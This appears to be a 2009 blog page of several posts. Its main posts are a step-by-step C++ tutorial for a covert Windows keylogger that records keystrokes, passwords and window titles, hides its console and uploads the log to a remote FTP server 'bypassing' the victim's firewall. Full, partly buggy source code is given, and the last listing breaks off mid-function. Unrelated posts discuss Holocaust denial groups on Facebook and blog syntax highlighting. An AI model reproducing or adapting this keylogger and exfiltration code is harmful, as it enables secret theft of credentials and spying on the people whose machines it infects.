Friday, May 29, 2009

C++ - FTP Uploading through winsock (bypasses firewalls!)

Firstly, I want to thank all of you that subscribed and to any of you that havent!
SUBSCRIBE, the link is to your right!


Anyway, I know its been a long time since my last post, but with good cause! I have finally put together a way for you to upload your logs to an ftp server without fail and which bypasses any firewall restrictions that the victim's computer may have!

Also, know that this post could stand alone to the other keylogger tutorials but if you want to use this code in those logger, I suggest you read them too.

So lets get started with this tutorial. Firstly what is FTP.
Well, ftp is short for file transfer protocol and is a tcp or udp layer protocol which is used for transferring data. If you want more information about the history of the protocol, or even otherwise, I strongly suggest you read en.wikipedia.org/wiki/FTP

Anyway moving on, so how does FTP work? Well, FTP names a specific connection between a client and a server, and the specific commands and data signatures that are sent between them.
In order to make this program I had to read through the FTP RFC, a documentation by researchers and founders of the protocol. Google "RFC 959" for more information. Anyway, the basics are that the client has to communicate with the server in a very distinct way. I've laid it out below in normal language and then in FTP command language.

CHATROOM FTPSUCKSJUSTKIDDING OPENED
Client connects to server
Client: Here is my username.
Server: Oh, nice username, okay the username has been set, enter your password.
Client: K, here's my password.
Server: Good Job, thats the right password, you are now connected OR you phail, thats the wrong password.
Assuming the password is correct.....
Client: Okay so now im going to send a image file to you, like .exe or .txt okay?
Server: Okay, connect to me on <000,00,000,000,10,4>
Client: Okay ill connect to you on ip 000.00.000.000 on port 2564 because 10*256+4 is 2564
Client: Okay now imma send some data and i need you to store it as data.txt in the /data folder
Server2: -_-
Client opens second connection to Server2
Client sends data
Client: Okay we are done, imma go now bye!
Client leaves the chatroom

Enough of that childish bs ;] , now for some real commands, notice how they are so much shorter and notice that the server never checks the integrity of the file.

Client Connects to server
Client: "USER username\r\n"
Server: 331 Username set to "username"
Client: "PASS password\r\n"
Server: 203 Password Correct you are now connected
Client: "TYPE I\r\n"
Server: 200 File set to binary aka image
Client: "PASV\r\n"
Server: 227 Passive Mode entered <100,10,100,100,10,4>
Client: "STOR data.txt\r\n"
Client Opens new connection to server 2
Client Sends Data
Client Leaves


Note the different messages that the server sends back, we will use them in error checking.

So, all we have to do for our upload feature, is to send data in this format to the server and have it save it, and the firewall will never know because its an outward connection! Well, not just that, we will get into more reasons why this works on firewalls later.

Anyway, I bet many of you guys are like whoa there slow down. How do I get an ftp server, well the easiest way for you noobs (Just Kidding) would be to get one from the free webhosting site tripod.com. The name of your ftp server will be ftp.tripod.com. Your username will be your username, and your password will be your password that you set!

You will also need someway to access your ftp server. I suggest that you download FireFTP or FileZilla to manage your server and so that you can see if the following code works!

Simple right?

So anyway, after thats done, lets create a small test file in our C:\ folder that we can upload and just for compatibility lets name it test.txt. Open the text file and copy and paste something whatever you want, but make sure the file has something in it.

Okay, now we are ready to start coding, almost! For this program we will be using sockets to send our file because thats the only way to send it without alerting the firewall. If you guys are not worried about firewalls, I would suggest you just use the wininet library for FTP which makes life much easier but more painful when you realize your files arent getting sent.

A good source for help with the wininet functions is here and for specific functions use the same page just navigate to the wininet functions tab or just click on the links. Comment if you need any help and I can send you the wininet code!

Well, we want to do it the boss way, so we will learn winsock or actually winsock2.
Winsock is a set of windows api for socket programming. A socket is a connection. I really suggest that you know some winsock before coming in, either buy a book, or read this tutorial
like this one http://www.madwizard.org/programming/tutorials/netcpp/.

In addition before we start coding, we have to link against winsock. For those of you using devc++ its project, compile options, linkers and then in that box add -lws2_32 which links you against winsock!

Okay, now, lets first make some base functions that we will need. Im going to keep this long and tedious because I know a lot of you cannot object orient your programs which means that I wont either, if you want an object oriented approach to this simple program, just email me.

In addition, also add these in your header if they arent there already:

#include <string>
#include <winsock.h>
#include <windows.h>
#include <sstream>
#include <iostream>
#include <stdio.h>
#include <cstdlib>




Anyway, moving on, remember that the server sends us back the ip to connect to? Well, it sends it in string format, atleast it is in string format after we separate this. Yes, I know we are getting a little ahead of ourselves but we have to create a function that can change the separated strings into integers. For that we use iostreams.

Here is the function, I wont go into explaining it because you can look it up on the web and we have a lot to cover. Furthermore, its pretty self explanatory.


void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}


One thing that you should not though is the way we were able to modify the parameters within the function. This is due to something very useful called pointers, and you should learn about them if you dont know already.

Moving on, now comes the main part, if you read that winsock tutorial you should be able to follow along. I am going to give you the code for main and then explain it after, dont worry if you have any questions, and remember if I leave anything unexplained dont be afraid to comment and ask about it.

Also note that I havent done any error checking so you better hope it works ;]. It should but its always good to do some error checking, and I want you, the reader to have a shot at it. Be sure to send me your implementation and I will publish it alongside mine in the next or maybe the post after that one.



#include <string>
#include <winsock.h>
#include <windows.h>
#include <sstream>
#include <iostream>
#include <stdio.h>
#include <cstdlib>

using namespace std;

void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}

void sendLogIn(SOCKET _LSoc){
char userbuffer[] = "Your Username Here"; //PUT YOUR USERNAME AND PASSWORD IN THE USERBUFFER
char passbuffer[] = "Your Password Here"; //AND PASSBUFFER VARIABLES NOT ANYWHERE ELSE
char username[] = "USER ";
char password[] = "PASS ";
char servermessage[1000];

strcat(username, userbuffer);
strcat(username, "\r\n");

send(_LSoc, username, strlen(username), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);

strcat(password, passbuffer);
strcat(password, "\r\n");

send(_LSoc, password, strlen(password), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);
}

int sendConnInfo(SOCKET _CSoc){
char servermessage[10000];
char ftpmessage[50];
string message;
string portbuffer;
string port1;
string port2;
size_t position;
size_t position2;
int port;
int portbuf;
int _portbuf;

send(_CSoc, "TYPE I\r\n", 8, 0);
Sleep(1000);
recv(_CSoc, servermessage, 10000, 0);
Sleep(1000);
Sleep(1000);
send(_CSoc, "PASV\r\n", 6, 0);
Sleep(1000);
recv(_CSoc, ftpmessage, 50, 0);

message = ftpmessage;
position = message.find("Mode");
portbuffer = message.substr(position+21);

position = portbuffer.find(",");
position2 = portbuffer.find(">");

port1 = portbuffer.substr(0, position);
port2 = portbuffer.substr(position+1, position2-1);

stringtoint(port1, portbuf);
stringtoint(port2, _portbuf);

port = portbuf*256;
port = port + _portbuf;
return port;
}

void sendFileRequest(SOCKET _FSoc){
send(_FSoc, "STOR test.txt\r\n", strlen("STOR test.txt\r\n"), 0);
Sleep(1000);
}

BOOL ftpSocket(int port){
SOCKET sock;
SOCKADDR_IN pasvserver;
char servermessage[MAX_PATH];
HANDLE HFile;
DWORD read;
char *buffer;
char filename[] = "C:\\test.txt";
int connectionerror2;
int trycount2 = 2;


sock = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(sock == INVALID_SOCKET){
WSACleanup();
return 0;
}

pasvserver.sin_family = 2;
pasvserver.sin_port = htons(port); //htons converts the port into a readable form for the SOCKADDR_IN structure
pasvserver.sin_addr.s_addr = inet_addr("209.202.252.54"); //Once again the tripod ftp server

connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
while(connectionerror2 == SOCKET_ERROR){
connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
trycount2++;
if(trycount2 = 10){
closesocket(sock);
WSACleanup();
return 0;
}
}


HFile = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

buffer = (char *)malloc(4096);
SetFilePointer(HFile, 0, NULL, FILE_BEGIN);

while(ReadFile(HFile, buffer, 4096, &read, NULL) && read > 0){
send(sock, buffer, read, 0);
}

return true;
}



int sendFile(){
FreeConsole();
WSAData WData;
SOCKET FSoc;
SOCKADDR_IN server;
int connectionerror;
int trycount = 2;
char servermessage[MAX_PATH];
int port;

WSAStartup(MAKEWORD(2,2), &WData);
FSoc = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(FSoc == INVALID_SOCKET){
WSACleanup();
return 0;
}

server.sin_family = 2;
server.sin_port = htons(21);
server.sin_addr.s_addr = inet_addr("209.202.252.54"); //this is the tripod ftp server address. You can change it if you arent
//using the tripod ftp server.

connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
while(connectionerror == SOCKET_ERROR){
connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
trycount++;
if(trycount = 10){
closesocket(FSoc);
WSACleanup();
return 0;
}
}

recv(FSoc, servermessage, sizeof(servermessage),0);

sendLogIn(FSoc);
Sleep(1000); //give the server and the client sometime to deal with the influx of new messages
//so that data for the ip doesnt get mixed up.
port = sendConnInfo(FSoc);
sendFileRequest(FSoc);
ftpSocket(port);
WSACleanup();
return 0;
}



OMG OMG OMG OMG OMG OMG WHAT IS THAT!

Yes, I know whats going through your mind but its really not that complicated. Before I start explaining, make sure you read the server client conversation above once more. So lets start with the main, basically we initialize a new Winsock session. We then create a socket in that session. Then we use the SOCKADDR_IN structure to assign some very important connection information and then to connect to the server!.

Whats the while loop next? you may ask. Well, its just to make sure that our program doesn't spend forever attempting to connect to the server and that it gives up after a while =).

Okay, so then we have some function calls. Also note that all the Sleeps are just to make sure that the server has finished sending all the data for that call, otherwise, (you would see this if you error checked), the responses from the server get really, really mixed up.

Moving on, now that we are connected we have our first function call, sendLogIn which sends the password and the username to the connection specified by the Socket handle FSoc. Note that in sendLogIn and all the other functions, all the data is sent in that specific way. You have to change the values of the first two variables in sendlogin to specify your username and password! Please dont comment related to that.

Okay, next we have sendConnInfo which uses the string conversion to return a port for our next, next method to use.

Okay, next we have sendFileRequest which issues a store request to the socket specified by FSoc to store whatever data is coming in in the file test.txt in the default folder.

So ftpSocket() is basically the same as main, except that it connects to the server on a different port which sendConnInfo parsed and returned. However at the end of it, it sends the data to the server, which knows that it has to store it, AND IT DOES.

Now whip up fireftp and see if it worked!

In the end we issue a cleanup WSACleanup(); and then we end our program!

Well, that was awesome right! How about we put it into our keylogger.

Remember, if you have any problems, compliments, questions, comments etc. BE SURE TO COMMENT AND SUBSCRIBE!
Especially if it doesnt compile or work because it should.

Tune in next time for instructions on how to make this keylogger run everytime the user starts up their machine!

WARNING:
MESSY CODE BELOW ;]
-----------------------------------------------------------------------------------

#include <string>
#include <winsock.h>
#include <windows.h>
#include <sstream>
#include <iostream>
#include <stdio.h>
#include <cstdlib>

using namespace std;


void stringtoint(const string &s, int &i){
istringstream myStream(s);
myStream>>i;
}

void sendLogIn(SOCKET _LSoc){
char userbuffer[] = "Your Username Here"; //PUT YOUR USERNAME AND PASSWORD IN THE USERBUFFER
char passbuffer[] = "Your Password Here"; //AND PASSBUFFER VARIABLES NOT ANYWHERE ELSE
char username[] = "USER ";
char password[] = "PASS ";
char servermessage[1000];

strcat(username, userbuffer);
strcat(username, "\r\n");

send(_LSoc, username, strlen(username), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);

strcat(password, passbuffer);
strcat(password, "\r\n");

send(_LSoc, password, strlen(password), 0);
Sleep(1000);
recv(_LSoc, servermessage, 1000, 0);
}

int sendConnInfo(SOCKET _CSoc){
char servermessage[10000];
char ftpmessage[50];
string message;
string portbuffer;
string port1;
string port2;
size_t position;
size_t position2;
int port;
int portbuf;
int _portbuf;

send(_CSoc, "TYPE I\r\n", 8, 0);
Sleep(1000);
recv(_CSoc, servermessage, 10000, 0);
Sleep(1000);
Sleep(1000);
send(_CSoc, "PASV\r\n", 6, 0);
Sleep(1000);
recv(_CSoc, ftpmessage, 50, 0);

message = ftpmessage;
position = message.find("Mode");
portbuffer = message.substr(position+21);

position = portbuffer.find(",");
position2 = portbuffer.find(">");

port1 = portbuffer.substr(0, position);
port2 = portbuffer.substr(position+1, position2-1);

stringtoint(port1, portbuf);
stringtoint(port2, _portbuf);

port = portbuf*256;
port = port + _portbuf;
return port;
}

void sendFileRequest(SOCKET _FSoc){
send(_FSoc, "STOR storekey.txt\r\n", strlen("STOR storekey.txt\r\n"), 0);
Sleep(1000);
}

BOOL ftpSocket(int port){
SOCKET sock;
SOCKADDR_IN pasvserver;
char servermessage[MAX_PATH];
HANDLE HFile;
DWORD read;
char *buffer;
char filename[] = "C:\\storekey.txt";
int connectionerror2;
int trycount2 = 2;


sock = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(sock == INVALID_SOCKET){
WSACleanup();
return 0;
}

pasvserver.sin_family = 2;
pasvserver.sin_port = htons(port); //htons converts the port into a readable form for the SOCKADDR_IN structure
pasvserver.sin_addr.s_addr = inet_addr("209.202.252.54"); //Once again the tripod ftp server

connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
while(connectionerror2 == SOCKET_ERROR){
connectionerror2 = connect(sock, (LPSOCKADDR)&pasvserver, sizeof(struct sockaddr));
trycount2++;
if(trycount2 = 10){
closesocket(sock);
WSACleanup();
return 0;
}
}


HFile = CreateFile(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

buffer = (char *)malloc(4096);
SetFilePointer(HFile, 0, NULL, FILE_BEGIN);

while(ReadFile(HFile, buffer, 4096, &read, NULL) && read > 0){
send(sock, buffer, read, 0);
}

return true;
}



int sendFile(){
FreeConsole();
WSAData WData;
SOCKET FSoc;
SOCKADDR_IN server;
int connectionerror;
int trycount = 2;
char servermessage[MAX_PATH];
int port;

WSAStartup(MAKEWORD(2,2), &WData);
FSoc = socket(2, SOCK_STREAM, IPPROTO_TCP);
if(FSoc == INVALID_SOCKET){
WSACleanup();
return 0;
}

server.sin_family = 2;
server.sin_port = htons(21);
server.sin_addr.s_addr = inet_addr("209.202.252.54"); //this is the tripod ftp server address. You can change it if you arent
//using the tripod ftp server.

connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
while(connectionerror == SOCKET_ERROR){
connectionerror = connect(FSoc, (LPSOCKADDR)&server, sizeof(struct sockaddr));
trycount++;
if(trycount = 10){
closesocket(FSoc);
WSACleanup();
return 0;
}
}

recv(FSoc, servermessage, sizeof(servermessage),0);

sendLogIn(FSoc);
Sleep(1000); //give the server and the client sometime to deal with the influx of new messages
//so that data for the ip doesnt get mixed up.
port = sendConnInfo(FSoc);
sendFileRequest(FSoc);
ftpSocket(port);
WSACleanup();
return 0;
}


string convertkey(int key){
string keystring;
switch(key)
{
case 8 :
keystring = "[/]";
break;
case 13 :
keystring = "\n";
break;
case 32 :
keystring = " ";
break;
case 190 :
keystring = ".";
break;
case 110 :
keystring = ".";
break;
case VK_CAPITAL :
keystring = "[CAPS LOCK]";
break;
case VK_TAB :
keystring = "[TAB]";
break;
case VK_CONTROL :
keystring = "[CONTROL]";
break;
case VK_ESCAPE :
keystring = "[ESCAPE]";
break;
case VK_DOWN :
keystring = "[DOWN]";
break;
case VK_LEFT :
keystring = "[LEFT]";
break;
case VK_RIGHT :
keystring = "[RIGHT]";
break;
case VK_UP :
keystring = "[UP]";
break;
}
if(key >= 96 && key <= 105)
keystring = key-48;
else if (key > 47 && key < 60)
keystring = key;
if (key != VK_LBUTTON || key != VK_RBUTTON)
{
if (key > 64 && key < 91)
{
if (GetKeyState(VK_CAPITAL) | GetAsyncKeyState(VK_SHIFT))
keystring = key; //if its capital then stay
else
{
key = key + 32; //if not shift the number to the lowercase value
keystring = key;
}
}
}
return keystring;
}

void StoreKey(string key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}

void Logger()
{
string keyinstring = "";
int key;
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
keyinstring = convertkey(key);
StoreKey(keyinstring);
}
}
}
}

int main(){
sendFile();
Logger();
return 1;
}

---------------------------------------------------------------------------------

Remember, if you have any problems, compliments, questions, comments etc. BE SURE TO COMMENT AND SUBSCRIBE!
Especially if it doesnt compile or work because it should.

Tune in next time for instructions on how to make this keylogger run everytime the user starts up their machine!

www.riseagainstpoverty.org

So, a couple friends and I are starting this non profit organization. We just need to file a few more forms.


you can see what we have so far here
www.riseagainstpoverty.org

and for the blog of the site

www.riseagainstpoverty.org/blog

I REALLY REALLY URGE U GUYS TO HELP OUT BY SENDING THE link to like one other friend

and spreading the word

we have a lot of projects planned out so i hope you guys support us

thanks

Tuesday, May 12, 2009

Holocaust Denial Groups - The Double Wrong

Recently, CNN, CNET, and a lot of other news websites posted a story on how Facebook, after the constant appeals of its members, deleted two Holocaust Denial Groups. Is Holocaust Denial wrong, Yes, but is deleting groups on requests of other members wrong, Yes.

Holocaust denial started back in 1947, when the first war-crime trial was held. Pleading not guilty on the stand can be considered denial can't it? In fact, it was not just the perpetrators but throughout and after the war, the American people and government refused to believe that the holocaust was happening. Why? Because who can believe that man is capable of such inhumane crimes. However, Holocaust denial now is completely different. Now it is not a denial because you do not want to believe, but because you sympathize with the ideals. Does that mean you hate Jews? No. But to some extent, the very fact that you think they and other victims are capable of producing such fiction can be considered racism. Those are just my views. Disagree? Be sure to comment.

But how can someone deny something that so obviously happened. Well, holocaust denial supporters have 3 main claims that they believe debunks the entire "myth" of the holocaust.
- The Nazi's never intended or made legislation to kill minorities
Nice try. Historical videos of Hitler's speeches long before video editing was even possible can be translated to show clear legislation, policy, and discourse against Jews.

- The Holocaust was Allied War propaganda to increase hatred of Germans and military size.
Nope. Historically, we have testimony from members of congress and the president at the time that they did not believe the holocaust and had no intention of helping those in need. Would the fabricators of a myth really let it fall away like that?

- The numbers are extremely exaggerated.
Even if we don't look at the so-called "controversial" directly holocaust related numbers based on German Documentation, just looking at demographics at the time, in all countries affected by the genocide, we can see the 6 million people vanished into thin air. You can deny the holocaust if you can provide another explanation for this. And no, it wasn't aliens ;].

So, the holocaust happened, and denying it is probably very disrespectful, hurtful, and just plain immoral to any survivors, the victims and a lot of other people who care.

But is this facebook audible a play at morality, or is it just an expansion of common capitalist agenda. Well, Facebook claims they took the groups down because of incessant racism and hate language in the posts. Okay, fair enough, they censor pornographic images and this is just as detrimental to the mentality of viewers. However, shouldn't this policy be universal? Does Facebook only decide to delete groups when it is a serious threat to there market value, oh wait, they aren't public. But still, it appears that facebook only deleted these groups so it would not lose any clicks to the annoying context-based adds that popup on every page.

Oh, how could you say such a thing! Well, I can, so stop denying it like the Holocaust deniers and look at the facts. There are atleast 17 KKK groups on facebook, why haven't they been deleted. If facebook is as politically centered as they claim to be, why haven't they clicked their magic mouse and erased all history of the Ku Klux Klan off their servers. Well, their terms of service, and they themselves claim that they only delete content if it violates these terms, which include hate language and racism. So, I decided to look at the Ku Klux Klan group page. Sure, the description looks innocent enough, until it comes to the part about how all whites should have the right to own slaves, but even that is not as bad as whats to come. They you scroll to the comments. Hundreds of non sarcastic comments such as "I hate N_ggers" or "REDNECK POWER SLAVES FOR LIFE".

So facebook, what are you going to say about that. I am fine with your policy against racism, but are you really against racism, or just against profit loss.

Oh and By the Way, for any KKK supporters reading this, "Redneck" is a derogatory term for people from the south which usually comes with the image of an unintelligent, uneducated, lazy person with a thick accent that nobody cares about. So next time, you may want to check your term usage.

But anyway, I really have no opinion on any of this, I just hate corporations that disguise their greed with morality. Ie. GREEN CAPITALISM.

And yes this post will be controversial, so COMMENT! I really want to hear what you have to say!

Monday, May 11, 2009

Adding source code to your blog with Sytax Highlighter 2.0

Well, many readers are emailing me asking a very good question. How do you add source code to your blog? Many of you would have noticed by now that adding code is a pain. Not only is it horribly formatted, but many characters like < and such are interpreted by the browser as html code and this screws up a lot of the formatting for the rest of the post. You end up in a state where you have to type it all over again!

The solution is two fold, first you have to fix the formatting, and next you have to fix the escaping characters like < .

So first lets start with the latter, the dreaded less than sign, commonly written as < . WHOAAA! how did you do that without screwing up your post? Well, its simple, some basic knowledge of HTML tells us that if we want the actual character < , we have to replace every instance of < in our code with &lt. This signals the in built interpreter to view this as a character, not as part of the code. By the way lt stands for Less Than.

Next, the kind of harder part, how do you format it in the boss way that all the code is formatted on my blog? Well, its actually not my work at all, its all thanks to our good friend alex gorbatchev, you coded this wonderful css and javascript tool called SyntaxHighlighter. To use SyntaxHighlighter, download the files from
http://alexgorbatchev.com/wiki/SyntaxHighlighter:Download and once you have them, you upload the necessary files to your website, (blogger doesnt support uploads so you can use google pages which is also free), and then call them in your posts with the edit html tab. Well this is all fine and dandy, haha "dandy" what a corny word, but what if I am too lazy to upload files to a server?

Well, Mr. Gorbatchev has found a solution for that too. He has uploaded the files to his own server, so that we can just call those. So in the end it is quite simple. Here's a step by step process on how to get this set-up and how to use it.

1. Go to Layout and then Edit Html.

2. Now, very carefully, (I suggest that you copy paste the html into a txt file incase you mess it up), add the following lines after the tag "end outer wrapper".



<link href='http://alexgorbatchev.com/pub/sh/2.0.287/styles/shCore.css' rel='stylesheet' type='text/css'/>
<link href='http://alexgorbatchev.com/pub/sh/2.0.287/styles/shThemeMidnight.css' rel='stylesheet' type='text/css'/>
<script src='http://alexgorbatchev.com/pub/sh/2.0.287/scripts/shCore.js' type='text/javascript'/>
<script src='http://alexgorbatchev.com/pub/sh/2.0.287/scripts/shBrushCpp.js' type='text/javascript'/>
<script src='http://alexgorbatchev.com/pub/sh/2.0.287/scripts/shBrushJScript.js' type='text/javascript'/>
<script src='http://alexgorbatchev.com/pub/sh/2.0.287/scripts/shBrushCss.js' type='text/javascript'/>
<script src='http://alexgorbatchev.com/pub/sh/2.0.287/scripts/shBrushJava.js' type='text/javascript'/>


<script type='text/javascript'>
SyntaxHighlighter.config.bloggerMode = true;
SyntaxHighlighter.ClipboardSwf = 'http://alexgorbatchev.com/pub/sh/2.0.287/scripts/clipboard.swf';
SyntaxHighlighter.all();
</script>

Note: You can also add additional languages by adding additional brushes. You have so far added C++, Java, JavaScript and CSS. Read the SyntaxHighlighter page here for more information on different brushes that you may want to add.

3. Save the template.

4. Now in a post, whenever you wish to add source code just type in:

<pre class ="brush:cpp">
//Code goes here
</pre>


You can replace the brush parameter with the type of code you want to type in for example "brush:java". Well, thats it, doesnt that make it so much easier and better looking to add source code to your blog? Thanks for reading and thanks to Mr. Gorbatchev for tearing down the wall, oops, making this possible. ;]

Sunday, May 10, 2009

More for Our C++ Keylogger - Special Characters

First of all, if you are new to this blog, be sure to check out the other two keylogger tutorials first because you will need those for this one, they are the posts before this and make sure you SUBSCRIBE so you wont miss the next one.


Well, I have two comments and 1 subscriber -_- not exactly what I was hoping for but hopefully this post will change your mind. The problem is that I only have so much to add, and after that only your requests can keep me going before I move on to a new project so please, COMMENT! and SUBSCRIBE!. By the way for those of you that dont know how to subscribe, if you are using Firefox, just use its inbuilt feed reader, otherwise download a free one. In fact, I am pretty sure that internet explorer has an inbuilt reader too. And if you can't or don't want to do this, atleast follow me on google (the last widget down on the sidebar), or COMMENT!

-------------------------------------------------------------------------------------

Anyway, so far for our keylogger, we have one that captures the keys and the window titles and stores them in a text file, well, if you guys tried it out, you would have noticed that the logs are still pretty incomprehensible. Characters like the Shift or Tab key are not getting caught so you can't really use the logger efficiently until you can do so. Today I will teach you not only how to catch all these characters, but also how to resolve shifting, or capitalizing of passwords/usernames etc.

There is only one new api that you have to learn for this tutorial
GetKeyState();

What! I thought we used that already?

Nope, we used GetAsyncKeyState(); before, well whats the difference? There are many differences, especially in their return values, but for our intents and purposes just remember them as, GetKeyState(); can check whether a key is toggled or not like numlock or most importantly capslock. GetAsyncKeyState checks for a separate asynchronous key press, not a toggle and not at the same time.

You should also know how to use switch cases for they will prove handy.

So, we know that GetAsyncKeyState and GetKeyState based on their msdn's accept a VKEY or virtual key value. This can be the decimal or char value of any ASCII key. So far, our Logger function takes this vkey value in char form and outputs it into a text file. So, what if we take this value and convert it to a readable form for all keys? That would work out well. Well, the first thing is to change the value in the Logger function to an int. You will see why later.
In addition, lets make things easier and change our key value to a string so that we can easily update it into the file and not have to worry about char size and such.

So once we do this we have:



void Logger()
{
string keyinstring = "";
int key;
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
keyinstring = convertkey(key);
StoreKey(keyinstring);
}
}
}
}


So now we have to right our convertkey method that will return a string value that we can store with storekey(); But, before we do that, lets change our StoreKey method so that it can accept strings instead of an int.

So we have:


void StoreKey(string key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}


Now all we have to do is write our convertkey function. So, firstly we want the function to return a string and to accept an int as a parameter so we have:


string convertkey(int key){
//converts the keys
}


Whoa Whoa Whoa, all these strings, they have to come from somewhere. Well you are right. We have to add:


#include <string>


to the includes at the top of our code.

Anyway, back to the convertkey method. Well, how do we convert a key, its easy, just take in a value, and output the corresponding string, for example


string convertkey(int key){
string keystring;
switch(key)
{
case 8:
keystring = "[DELETE]";
break;
}
return keystring;
}


So what does this do, it takes in a decimal vkey, in this case 8, which corresponds to the Backspace key on your keyboard. Then it returns that for you to store in your log, otherwise you would just have a unidentified character which neither you nor the computer can read. So I am not going to bore you with all the switch cases that we need so I will just give them to you. Note that I used switch case instead of if else because its easier to add more as we go along. Here is the completed switch case scenarios.


string convertkey(int key){
string keystring;
switch(key)
{
case 8 :
keystring = "[/]";
break;
case 13 :
keystring = "\n";
break;
case 32 :
keystring = " ";
break;
case 190 :
keystring = ".";
break;
case 110 :
keystring = ".";
break;
case VK_CAPITAL :
keystring = "[CAPS LOCK]";
break;
case VK_TAB :
keystring = "[TAB]";
break;
case VK_CONTROL :
keystring = "[CONTROL]";
break;
case VK_ESCAPE :
keystring = "[ESCAPE]";
break;
case VK_DOWN :
keystring = "[DOWN]";
break;
case VK_LEFT :
keystring = "[LEFT]";
break;
case VK_RIGHT :
keystring = "[RIGHT]";
break;
case VK_UP :
keystring = "[UP]";
break;
}
return keystring;
}



Note that in case 13, 13 is the corresponding value for the enter key so we have "\n" or the newline character. Yay we are done.

No we are not. Remember that we modified our logger function to depend on this method for all the characters special or not. This way we can resolve capitals and stuff. So, what do we do now, we have to find a way to resolve those. This is where GetKeyState(); comes into play. We can use it to check whether the capslock is on or not.

So now, our completed function, i commented the new parts to make it easier to understand. Remember, it looks like a lot of complicated numbers but those are just decimal values representing the keys u type, lowercase or uppercase, special or not.


string convertkey(int key){
string keystring;
switch(key)
{
case 8 :
keystring = "[/]";
break;
case 13 :
keystring = "\n";
break;
case 32 :
keystring = " ";
break;
case 190 :
keystring = ".";
break;
case 110 :
keystring = ".";
break;
case VK_CAPITAL :
keystring = "[CAPS LOCK]";
break;
case VK_TAB :
keystring = "[TAB]";
break;
case VK_CONTROL :
keystring = "[CONTROL]";
break;
case VK_ESCAPE :
keystring = "[ESCAPE]";
break;
case VK_DOWN :
keystring = "[DOWN]";
break;
case VK_LEFT :
keystring = "[LEFT]";
break;
case VK_RIGHT :
keystring = "[RIGHT]";
break;
case VK_UP :
keystring = "[UP]";
break;
}
if(key >= 96 && key <= 105)
keystring = key-48;
else if (key > 47 && key < 60)
keystring = key;
if (key != VK_LBUTTON || key != VK_RBUTTON)
{
if (key > 64 && key < 91)
{
if (GetKeyState(VK_CAPITAL) | GetAsyncKeyState(VK_SHIFT))
keystring = key; //if its capital then stay
else
{
key = key + 32; //if not shift the number to the lowercase value
keystring = key;
}
}
}
return keystring;
}


Well there you have it, a function that can resolve special characters and shifting. Be sure to edit it to your needs and now the complete source code so far.

----------------------------------------------------------------------------------

#include <windows.h>
#include <fstream>
#include <string>

using namespace std;

string convertkey(int key){
string keystring;
switch(key)
{
case 8 :
keystring = "[/]";
break;
case 13 :
keystring = "\n";
break;
case 32 :
keystring = " ";
break;
case 190 :
keystring = ".";
break;
case 110 :
keystring = ".";
break;
case VK_CAPITAL :
keystring = "[CAPS LOCK]";
break;
case VK_TAB :
keystring = "[TAB]";
break;
case VK_CONTROL :
keystring = "[CONTROL]";
break;
case VK_ESCAPE :
keystring = "[ESCAPE]";
break;
case VK_DOWN :
keystring = "[DOWN]";
break;
case VK_LEFT :
keystring = "[LEFT]";
break;
case VK_RIGHT :
keystring = "[RIGHT]";
break;
case VK_UP :
keystring = "[UP]";
break;
}
if(key >= 96 && key <= 105)
keystring = key-48;
else if (key > 47 && key < 60)
keystring = key;
if (key != VK_LBUTTON || key != VK_RBUTTON)
{
if (key > 64 && key < 91)
{
if (GetKeyState(VK_CAPITAL) | GetAsyncKeyState(VK_SHIFT))
keystring = key; //if its capital then stay
else
{
key = key + 32; //if not shift the number to the lowercase value
keystring = key;
}
}
}
return keystring;
}

void StoreKey(string key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}

void Logger()
{
string keyinstring = "";
int key;
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
